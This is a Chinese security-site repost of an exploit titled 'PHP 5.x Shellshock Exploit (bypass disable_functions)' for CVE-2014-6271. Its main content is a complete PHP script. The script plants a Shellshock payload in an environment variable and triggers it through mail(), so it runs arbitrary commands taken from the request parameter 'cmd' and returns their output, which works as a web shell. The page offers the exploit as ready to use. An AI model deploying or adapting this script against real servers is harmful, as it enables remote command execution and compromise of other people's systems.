PHP 5.x - Bypass Disable Functions Vulnerability

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

PHP 5.x - Bypass Disable Functions Vulnerability

来源：vfocus.net 作者：Starfall 发布时间：2014-11-18

# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)

# Google Dork: none

# Date: 10/31/2014

# Exploit Author: Ryan King (Starfall)

# Vendor Homepage: http://php.net

# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror

# Version: 5.* (tested on 5.6.2)

# Tested on: Debian 7 and CentOS 5 and 6

# CVE: CVE-2014-6271

<?php

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @

mail.c:283

if(strstr(readlink("/bin/sh"), "bash") != FALSE) {

$tmp = tempnam(".","data");

putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");

// In Safe Mode, the user may only alter environment variables

whose names

// begin with the prefixes supplied by this directive.

// By default, users will only be able to set environment variables

that

// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is

empty,

// PHP will let the user modify ANY environment variable!

mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually

send any mail

}

else return "Not vuln (not bash)";

$output = @file_get_contents($tmp);

@unlink($tmp);

if($output != "") return $output;

else return "No output, or not vuln.";

}

shellshock($_REQUEST["cmd"]);

?>

[

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

推荐广告